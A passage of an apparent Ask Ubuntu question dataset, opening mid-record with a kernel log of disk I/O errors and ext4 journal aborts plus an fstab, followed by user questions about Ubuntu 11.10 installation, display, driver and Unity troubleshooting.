4096 starting block 2263511 ) [ 3694.126842 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.126847 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.126854 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 0b 27 fe 00 00 50 00 [ 3694.126870 ] end_request : i/o error , dev sda , sector 84617214 [ 3694.126984 ] buffer i/o error on device sda4 , logical block 749396 more errors ... [ 3694.126986 ] buffer i/o error on device sda4 , logical block 749397 [ 3694.127004 ] ext4-fs warning ( device sda4 ) : ext4_end_bio:258 : i/o error writing to inode 1043424 ( offset 1359872 size 40960 starting block 10577161 ) [ 3694.127016 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127021 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127028 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 1f d5 9e 00 00 88 00 [ 3694.127043 ] end_request : i/o error , dev sda , sector 85972382 [ 3694.127050 ] buffer i/o error on device sda4 , logical block 918784 more errors ... [ 3694.127147 ] buffer i/o error on device sda4 , logical block 918800 [ 3694.127155 ] ext4-fs warning ( device sda4 ) : ext4_end_bio:258 : i/o error writing to inode 1042831 ( offset 0 size 69632 starting block 10746564 ) [ 3694.127169 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127174 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127181 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 1f d9 1e 00 01 08 00 [ 3694.127196 ] end_request : i/o error , dev sda , sector 85973278 [ 3694.127202 ] buffer i/o error on device sda4 , logical block 918896 more errors ... [ 3694.127396 ] buffer i/o error on device sda4 , logical block 918928 [ 3694.127405 ] ext4-fs warning ( device sda4 ) : ext4_end_bio:258 : i/o error writing to inode 1042831 ( offset 458752 size 135168 starting block 10746692 ) [ 3694.127418 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127422 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127429 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 28 91 d6 00 00 20 00 [ 3694.127444 ] end_request : i/o error , dev sda , sector 86544854 [ 3694.127451 ] buffer i/o error on device sda4 , logical block 990343 [ 3694.127463 ] buffer i/o error on device sda4 , logical block 990344 [ 3694.127469 ] buffer i/o error on device sda4 , logical block 990345 [ 3694.127475 ] buffer i/o error on device sda4 , logical block 990346 [ 3694.127484 ] ext4-fs warning ( device sda4 ) : ext4_end_bio:258 : i/o error writing to inode 1043425 ( offset 4747264 size 16384 starting block 10818110 ) [ 3694.127497 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127502 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127509 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 28 ee ce 00 00 08 00 [ 3694.127524 ] end_request : i/o error , dev sda , sector 86568654 [ 3694.127531 ] quiet_error : 18 callbacks suppressed [ 3694.127536 ] buffer i/o error on device sda4 , logical block 993318 [ 3694.127541 ] lost page write due to i/o error on sda4 [ 3694.127554 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127558 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127566 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 2c 2d 6e 00 00 08 00 [ 3694.127581 ] end_request : i/o error , dev sda , sector 86781294 [ 3694.127587 ] buffer i/o error on device sda4 , logical block 1019898 [ 3694.127592 ] lost page write due to i/o error on sda4 [ 3694.127608 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127626 ] jbd2 : detected io errors while flushing file data on sda4-8 [ 3694.127628 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127636 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 b5 49 1e 00 00 78 00 [ 3694.127651 ] end_request : i/o error , dev sda , sector 95766814 [ 3694.127674 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127679 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127686 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 06 3e ef 16 00 00 40 00 [ 3694.127702 ] end_request : i/o error , dev sda , sector 104787734 [ 3694.127708 ] buffer i/o error on device sda4 , logical block 3270703 [ 3694.127715 ] buffer i/o error on device sda4 , logical block 3270704 [ 3694.127733 ] aborting journal on device sda4-8 . [ 3694.127729 ] buffer i/o error on device sda4 , logical block 3270705 [ 3694.127737 ] buffer i/o error on device sda4 , logical block 3270706 [ 3694.127745 ] buffer i/o error on device sda4 , logical block 3270707 [ 3694.127754 ] buffer i/o error on device sda4 , logical block 3270708 [ 3694.127760 ] buffer i/o error on device sda4 , logical block 3270709 [ 3694.127766 ] buffer i/o error on device sda4 , logical block 3270710 [ 3694.127775 ] ext4-fs warning ( device sda4 ) : ext4_end_bio:258 : i/o error writing to inode 1042850 ( offset 0 size 32768 starting block 13098474 ) [ 3694.127791 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127795 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127802 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 06 40 43 a6 00 00 48 00 [ 3694.127818 ] end_request : i/o error , dev sda , sector 104874918 [ 3694.127847 ] ext4-fs error ( device sda4 ) in ext4_reserve_inode_write:5641 : journal has aborted [ 3694.127852 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127857 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127864 ] sd 1:0:0:0 : [ sda ] cdb : [ 3694.127889 ] ext4-fs ( sda4 ) : delayed block allocation failed for inode 265108 at logical offset 0 with max blocks 9 with error -5 [ 3694.127902 ] ext4-fs ( sda4 ) : this should not happen ! ! data will be lost [ 3694.127911 ] [ 3694.127920 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.127927 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.127938 ] sd 1:0:0:0 : [ sda ] cdb : [ 3694.127948 ] ext4-fs error ( device sda4 ) in ext4_da_writepages:3033 : io failure [ 3694.127960 ] write ( 10 ) : 2a 00 04 af ad 9e 00 00 08 00 [ 3694.127984 ] end_request : i/o error , dev sda , sector 78622110 [ 3694.127981 ] write ( 10 ) [ 3694.127997 ] buffer i/o error on device sda4 , logical block 0 [ 3694.128024 ] : [ 3694.128028 ] lost page write due to i/o error on sda4 [ 3694.128035 ] 2a 00 02 4c 04 2f 00 00 08 00 [ 3694.128047 ] end_request : i/o error , dev sda , sector 38536239 [ 3694.128055 ] end_request : i/o error , dev sda , sector 38536239 [ 3694.128074 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.128083 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.128098 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 [ 3694.128125 ] aborting journal on device sda2-8 . [ 3694.128134 ] b3 ad 9e 00 00 08 00 [ 3694.128157 ] end_request : i/o error , dev sda , sector 95661470 [ 3694.128171 ] buffer i/o error on device sda4 , logical block 2129920 [ 3694.128184 ] lost page write due to i/o error on sda4 [ 3694.128231 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.128240 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.128255 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 02 4b 99 [ 3694.128293 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.128308 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.128325 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 00 07 99 5f 00 00 08 00 [ 3694.128370 ] end_request : i/o error , dev sda , sector 498015 [ 3694.128385 ] 5f [ 3694.128392 ] buffer i/o error on device sda2 , logical block 0 [ 3694.128404 ] lost page write due to i/o error on sda2 [ 3694.128417 ] 00 00 08 00 [ 3694.128439 ] end_request : i/o error , dev sda , sector 38508895 [ 3694.128451 ] buffer i/o error on device sda2 , logical block 4751360 [ 3694.128461 ] lost page write due to i/o error on sda2 [ 3694.128485 ] jbd2 : i/o error detected when updating journal superblock for sda2-8 . [ 3694.128493 ] jbd2 : i/o error detected when updating journal superblock for sda4-8 . [ 3694.128543 ] ext4-fs error ( device sda2 ) : ext4_journal_start_sb:296 : [ 3694.128555 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.128565 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.128582 ] sd 1:0:0:0 : [ sda ] cdb : write same ( 16 ) : 93 08 00 00 00 00 05 20 19 9e 00 00 00 c8 00 00 [ 3694.128643 ] end_request : i/o error , dev sda , sector 85989790 [ 3694.128658 ] detected aborted journal [ 3694.128671 ] ext4-fs ( sda2 ) : remounting filesystem read-only [ 3694.128681 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.128691 ] ext4-fs ( sda2 ) : previous i/o error to superblock detected [ 3694.128705 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.128720 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 00 09 15 e7 00 00 08 00 [ 3694.128776 ] end_request : i/o error , dev sda , sector 595431 [ 3694.128787 ] buffer i/o error on device sda2 , logical block 12177 [ 3694.128796 ] lost page write due to i/o error on sda2 [ 3694.128814 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.128823 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.128837 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 00 10 71 5f 00 00 08 00 [ 3694.128892 ] end_request : i/o error , dev sda , sector 1077599 [ 3694.128902 ] buffer i/o error on device sda2 , logical block 72448 [ 3694.128911 ] lost page write due to i/o error on sda2 [ 3694.128940 ] jbd2 : detected io errors while flushing file data on sda2-8 [ 3694.128988 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.128997 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.129012 ] sd 1:0:0:0 : [ sda ] cdb : write same ( 16 ) : 93 08 00 00 00 00 01 14 4e 67 00 00 00 50 00 00 [ 3694.129091 ] end_request : i/o error , dev sda , sector 18108007 [ 3694.129124 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.129133 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.129147 ] sd 1:0:0:0 : [ sda ] cdb : [ 3694.129156 ] journal commit i/o error [ 3694.129165 ] write ( 10 ) : 2a 00 00 07 99 5f 00 00 08 00 [ 3694.129204 ] end_request : i/o error , dev sda , sector 498015 [ 3694.129217 ] buffer i/o error on device sda2 , logical block 0 [ 3694.129229 ] lost page write due to i/o error on sda2 [ 3694.129445 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.129456 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.129466 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 04 af ad 9e 00 00 08 00 [ 3694.129486 ] end_request : i/o error , dev sda , sector 78622110 [ 3694.129496 ] buffer i/o error on device sda4 , logical block 0 [ 3694.129502 ] lost page write due to i/o error on sda4 [ 3694.129539 ] ext4-fs ( sda4 ) : previous i/o error to superblock detected [ 3694.129592 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.129597 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.129605 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 04 af ad 9e 00 00 08 00 [ 3694.129622 ] end_request : i/o error , dev sda , sector 78622110 [ 3694.129655 ] ext4-fs error ( device sda4 ) : ext4_journal_start_sb:296 : [ 3694.129665 ] ext4-fs error ( device sda4 ) in ext4_dirty_inode:5768 : journal has aborted [ 3694.129679 ] ext4-fs ( sda4 ) : previous i/o error to superblock detected [ 3694.129688 ] detected aborted journal [ 3694.129694 ] ext4-fs ( sda4 ) : remounting filesystem read-only [ 3694.129748 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.129755 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.129764 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 04 af ad 9e 00 00 08 00 [ 3694.129783 ] end_request : i/o error , dev sda , sector 78622110 [ 3694.129853 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.129859 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.129867 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 04 af ad 9e 00 00 08 00 [ 3694.129884 ] end_request : i/o error , dev sda , sector 78622110 [ 3694.129933 ] ext4-fs ( sda4 ) : ext4_da_writepages : jbd2_start : 654 pages , ino 265108 ; err -30 [ 3699.128384 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128393 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128403 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 2f ad 9e 00 00 08 00 [ 3699.128422 ] end_request : i/o error , dev sda , sector 87010718 [ 3699.128430 ] quiet_error : 3 callbacks suppressed [ 3699.128437 ] buffer i/o error on device sda4 , logical block 1048576 [ 3699.128442 ] lost page write due to i/o error on sda4 [ 3699.128461 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128466 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128473 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 2f ae 1e 00 00 08 00 [ 3699.128489 ] end_request : i/o error , dev sda , sector 87010846 [ 3699.128495 ] buffer i/o error on device sda4 , logical block 1048592 [ 3699.128500 ] lost page write due to i/o error on sda4 [ 3699.128510 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128515 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128522 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 2f b7 5e 00 00 10 00 [ 3699.128537 ] end_request : i/o error , dev sda , sector 87013214 [ 3699.128542 ] buffer i/o error on device sda4 , logical block 1048888 [ 3699.128547 ] lost page write due to i/o error on sda4 [ 3699.128553 ] buffer i/o error on device sda4 , logical block 1048889 [ 3699.128558 ] lost page write due to i/o error on sda4 [ 3699.128568 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128573 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128579 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 30 cc 9e 00 00 10 00 [ 3699.128594 ] end_request : i/o error , dev sda , sector 87084190 [ 3699.128600 ] buffer i/o error on device sda4 , logical block 1057760 [ 3699.128604 ] lost page write due to i/o error on sda4 [ 3699.128610 ] buffer i/o error on device sda4 , logical block 1057761 [ 3699.128615 ] lost page write due to i/o error on sda4 [ 3699.128625 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128630 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128637 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 06 2f ad be 00 00 08 00 [ 3699.128652 ] end_request : i/o error , dev sda , sector 103787966 [ 3699.128657 ] buffer i/o error on device sda4 , logical block 3145732 [ 3699.128662 ] lost page write due to i/o error on sda4 [ 3699.128672 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128676 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128683 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 06 3f ad c6 00 00 08 00 [ 3699.128698 ] end_request : i/o error , dev sda , sector 104836550 [ 3699.128703 ] buffer i/o error on device sda4 , logical block 3276805 [ 3699.128708 ] lost page write due to i/o error on sda4 [ 3699.128718 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128722 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128729 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 06 af af 6e 00 00 08 00 [ 3699.128744 ] end_request : i/o error , dev sda , sector 112177006 [ 3699.128749 ] buffer i/o error on device sda4 , logical block 4194362 [ 3699.128754 ] lost page write due to i/o error on sda4 [ 3699.128764 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128768 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128775 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 06 b0 b5 8e 00 00 08 00 [ 3699.128790 ] end_request : i/o error , dev sda , sector 112244110 [ 3699.128795 ] buffer i/o error on device sda4 , logical block 4202750 [ 3699.128800 ] lost page write due to i/o error on sda4 [ 3699.128811 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128815 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128822 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 06 b0 b8 0e 00 00 08 00 [ 3699.128837 ] end_request : i/o error , dev sda , sector 112244750 [ 3699.128848 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128852 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128859 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 04 ef ad d6 00 00 08 00 [ 3699.128874 ] end_request : i/o error , dev sda , sector 82816470 [ 3699.128884 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128889 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128896 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 04 ef ae 16 00 00 08 00 [ 3699.128910 ] end_request : i/o error , dev sda , sector 82816534 [ 3699.128921 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3699.128925 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3699.128932 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 05 2b f6 ee 00 00 08 00 [ 3699.128947 ] end_request : i/o error , dev sda , sector 86767342 [ 3704.688655 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3704.688665 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3704.688675 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 06 b0 b5 8e 00 00 08 00 [ 3704.688693 ] end_request : i/o error , dev sda , sector 112244110 [ 3704.688729 ] ext4-fs ( sda4 ) : previous i/o error to superblock detected [ 3704.688761 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3704.688766 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3704.688773 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 04 af ad 9e 00 00 08 00 [ 3704.688789 ] end_request : i/o error , dev sda , sector 78622110 [ 3704.688796 ] quiet_error : 4 callbacks suppressed [ 3704.688802 ] buffer i/o error on device sda4 , logical block 0 [ 3704.688807 ] lost page write due to i/o error on sda4 [ 3704.688826 ] ext4-fs error ( device sda4 ) : ext4_find_entry:934 : inode # 1043414 : comm firefox : reading directory lblock 0 [ 3709.562729 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.562738 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.562748 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 04 0e 1b df 00 00 20 00 [ 3709.562766 ] end_request : i/o error , dev sda , sector 68033503 [ 3709.562896 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.562906 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.562915 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 04 0e 1b df 00 00 08 00 [ 3709.562935 ] end_request : i/o error , dev sda , sector 68033503 [ 3709.563271 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.563281 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.563290 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 04 0e 1b df 00 00 08 00 [ 3709.563309 ] end_request : i/o error , dev sda , sector 68033503 [ 3709.563688 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.563697 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.563705 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 04 0e 1c 5f 00 00 20 00 [ 3709.563722 ] end_request : i/o error , dev sda , sector 68033631 [ 3709.563780 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.563787 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.563794 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 04 0e 1c 5f 00 00 08 00 [ 3709.563811 ] end_request : i/o error , dev sda , sector 68033631 [ 3709.564363 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.564370 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.564378 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 03 8c 20 5f 00 00 20 00 [ 3709.564395 ] end_request : i/o error , dev sda , sector 59514975 [ 3709.564476 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.564483 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.564491 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 03 8c 20 5f 00 00 08 00 [ 3709.564507 ] end_request : i/o error , dev sda , sector 59514975 [ 3709.564814 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.564822 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.564830 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 03 8c 20 5f 00 00 08 00 [ 3709.564847 ] end_request : i/o error , dev sda , sector 59514975 [ 3709.565627 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.565636 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.565645 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 03 8c 20 5f 00 00 08 00 [ 3709.565664 ] end_request : i/o error , dev sda , sector 59514975 [ 3709.565921 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.565928 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.565936 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 03 8c 20 5f 00 00 08 00 [ 3709.565952 ] end_request : i/o error , dev sda , sector 59514975 [ 3709.566243 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.566245 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.566248 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 03 8c 20 5f 00 00 08 00 [ 3709.566252 ] end_request : i/o error , dev sda , sector 59514975 [ 3709.566500 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3709.566507 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3709.566516 ] sd 1:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 03 8c 20 5f 00 00 08 00 [ 3709.566533 ] end_request : i/o error , dev sda , sector 59514975 /etc/fstab : proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda2 during installation uuid=f83e5cde-9d70-422f-a386-b0a75813a29b / ext4 defaults , noatime 0 1 # /boot was on /dev/sda1 during installation uuid=ff0e7521-c1bb-4278-b0e0-e215f107428e /boot ext2 defaults , noatime 0 2 # /home was on /dev/sda4 during installation uuid=f378f105-8c39-4f34-a2e1-9852c627166e /home ext4 defaults , noatime 0 2 # swap was on /dev/sda3 during installation uuid=2b42d60c-c73a-433c-a368-58dd65fac03a none swap sw 0 0
108073	system freezes after installing ubuntu	i 've tried 3 times now to install ubuntu 11.10 from a cd onto an 8 year old dell inspiron but after installation the system just freezes . system has 2.66ghz cpu , 1gb ram and 120gb hd . there is no way to perform any operation , i can only force shut down . has anyone encountered similar difficulties and found a solution ? the video card is nvidia geforcefx5200 . the screen is almost blank after booting - the top userbar is present but not functioning and nothing else appears on the screen . i 've managed to install ubuntu 10.04 without any problems now instead
108076	ubuntu server 11.10 iso image is loading desktop	i am trying to load server 11.10 i386 form an iso image on a usb stick . it loaded desktop instead . does not run tasksel during install and definitely loads gui . anybody else having this problem ? in the iso file under .disk/info it shows `` ubuntu-server 11.10 `` oneiric ocelot '' - release i386 ( 20111011 ) '' i 'm downloading another copy now and see if its the same . stumped thanks
108077	help installing ubuntu 11.10	downloaded and burnt ubuntu linux 11.10 installation on dvd . have new ide hard drive to install it on . computer system information : pentium ( r ) dual-core cpu e5200 @ 2.50ghz speed 2500mhz count 2 installed & useable size system memory : 2048mb updated the bios : version : 0603 build date : 08/20/10 every time i try and boot using the installation dvd i get the message : `` ( initramfs ) unable to find a medium containing a live file system '' . tried changing many different options in bios . seen a lot of people with a similar problem change the sata configuration from ide to ahci but i do n't have the option of choosing ahci . will appreciate any help with this .
108081	is there an unzipped ubuntu 11.10 available for download ?	i 've tried two decompressors : adl and universal , and they both say the ubuntu 11.10-desktop.iso is corrupt . i 'd like to bypass this step and install on my 4gb flash drive .
108089	still no space after removing files	i 've deleted lots of large files with rm and still df shows no space . on /dev/sda1 which is 2tb sata hdd , after deletion i have 3.6mb .trash-0 1.5t downloads 16k lost+found but df shows /dev/sda1 used : 1.7t avail:17g so how to really purge deleted files ?
108091	problem forcing gnome terminal to stretch across multiple monitors	i am running vim in gnome-terminal , and ideally i would like to have fullscreen mode stretch across both monitors , not just one . is there any way to do this ? if i disable ccsm > grid then i can stretch the terminal , but the results are less than ideal , observe : is there a way to fix the -- i do n't know what to call it exactly -- z buffer problem at the top ? if not , could someone point me in the direction of the source code so i could try to reverse engineer it to allow for dual monitor full screen mode ?
108101	restoring the ubuntu desktop and access to files	i recently got in way over my head playing with ubuntu 8.04 on a dell mini 910 . i think i deleted far more things than i should have trying to `` make space '' . i started finding the applications i wanted by searching the main files . then i selected `` change desktop '' and really messed things up . now when the computer boots up i only see the desktop background with nothing else , no icons , no keys do anything . i 've downloaded ubuntu 11.10 and run it from a thumb-drive on the machine but the hard-drive is too small to load it . any clues how i can get access to files , applications ? thanks . and if i gave you a laugh , no worries . john
108103	loss of `` reveal mode '' option in compizconfig settings manager	i 've been scouring the internet to no avail , i 'm going to make this quick . i followed this guide : replacing unity bar with docky ? i decided i did n't like it , followed his directions for reverting , and now the `` reveal mode '' option is gone from the compiz settings manager under unity plugin . it 's not a super huge deal , but it is pretty annoying having to use the super key to access the launcher . i 've tried reinstalling both unity and ccsm , neither has worked . can somebody help me restore this functionality ? ?
108104	amd catalyst driver 12.1	amd catalyst driver version 12.1 has been released . is suspend or sleep problem still there ? i checked 11.10 and 11.11 . performance is ok but after suspend laptop does not wake up . is 12.1 fix this ? if yes i will try it otherwise wait ... . thanks in advance
108105	how do i install kde on my 11.04	i want to get rid of the unity thingy ( who came up with this ? ) . kde seems the best choice . all the instructions , including this how do i install kde shell on ubuntu ? mention the ubuntu software center . i have no idea how to get to it in the new ui , how do i get to it ? i assume the apt-get install is enough ?
108110	how can i fix unity 3d ? it will not load	i have an acer aspire 5733z-4851 laptop running ubuntu 11.10 . i install ccsm back when i installed ubuntu on the system . one day i was playing around with the different settings , when it seemed like the system locked up . after restart of the computer ; when trying to log into unity 3d , the only thing that comes up after the desktop pattern is the menu bar that is normally hidden when unity starts up . it stays up , but the panel on the left hand side never comes up , nor do the icons at the top right of the menu bar . the only way to shut the system down , or restart is to press the power button and bring up the menu . i will note that unity 2d boots up perfectly fine . i have tried to repair broken packages , but there does not seem to be any . i have tried both synaptic and recovery console . i just managed to get through a major update , that updated the kernal , and unity . this did not fix the issue . i have also since removed ccsm hoping that would resolve the issue . i imagine that when i upgrade the machine to 12.04 that it would fix the issue , since when that happens basically the entire system would be replaced . do any of you have any other things i can try to get the 3d environment working correctly again ?
